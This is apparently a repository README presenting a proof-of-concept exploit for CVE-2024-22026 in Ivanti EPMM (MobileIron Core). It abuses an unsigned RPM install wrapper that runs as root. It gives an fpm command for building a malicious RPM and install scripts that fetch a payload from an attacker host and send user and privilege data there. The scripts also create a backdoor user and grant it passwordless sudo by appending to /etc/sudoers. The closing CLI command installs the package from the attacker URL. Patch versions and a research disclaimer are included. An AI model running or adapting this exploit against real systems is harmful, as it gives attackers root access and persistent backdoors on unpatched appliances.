Exploit POC for CVE-2024-22026 affecting Ivanti EPMM "MobileIron Core"
CVE-2024-22026 is a local privilege escalation vulnerability in Ivanti EPMM (formerly MobileIron) server versions prior to 12.1.0.0, 12.0.0.0, and 11.12.0.1. This vulnerability allows a local attacker to gain root access to the system by exploiting the software update process with a malicious RPM package from a remote URL.
Read the full blog post for detailed technical information: Exploiting CVE-2024-22026: Rooting Ivanti EPMM (MobileIron Core)
- CVE ID: CVE-2024-22026
- Severity: Undetermined
- Attack Vector: Local
- Impact: Allows local attacker to gain root access
- Affected Versions: Ivanti EPMM (formerly MobileIron) server versions prior to 12.1.0.0, 12.0.0.0, and 11.12.0.1
- Patch Availability: Patched in versions 12.1.0.0, 12.0.0.0, and 11.12.0.1
During our research, we discovered that the appliance uses the following command to fetch and install RPM packages as a low privilege user:
install rpm url <remote url>This above command is only a CLI wrapper for the following to occur which runs as root
/bin/rpm -Uvh *.rpmThis underlying rpm command does not enforce any signature verification or URL filtering, meaning any RPM package can be installed. This allows an attacker to forge and deliver a malicious RPM package that can compromise the appliance.
The following command is used to create a malicious RPM package:
fpm -s dir -t rpm -n ivanti-privesc -v 13.37 -a i386 --description "Ivanti POC" --maintainer "exploit-poc" --before-install preinstall.sh --after-install postinstall.sh -C .#!/bin/sh
curl -O http://<attacker_IP>/poc
exit 0#!/bin/sh
set -e # Enable strict error checking
# Report back current user and privilege level
CURRENT_USER=$(whoami | base64)
PRIV_LEVEL=$(id -u | base64)
curl http://<attacker_IP>/poc?user=$CURRENT_USER
curl http://<attacker_IP>/poc?priv=$PRIV_LEVEL
# Create a new root user
if ! useradd -s /bin/sh -m exploit-poc; then
echo "Failed to add user 'exploit-poc'" >&2
exit 1
fi
echo "exploit-poc:<redacted_password>" | chpasswd
# Grant root privileges
if ! echo "exploit-poc ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers; then
echo "Failed to modify sudoers file" >&2
exit 1
fi
exit 0To exploit the vulnerability, the attacker would run the following command in the CLI to fetch and install the malicious RPM:
install rpm url http://<attacker_IP>/ivanti-privesc-13.37-1.i386.rpmIvanti has released patches to address CVE-2024-22026 in the following versions:
- 12.1.0.0
- 12.0.0.0
- 11.12.0.1
This repository and its content are intended for educational and research purposes only. Use of the information contained herein is at your own risk.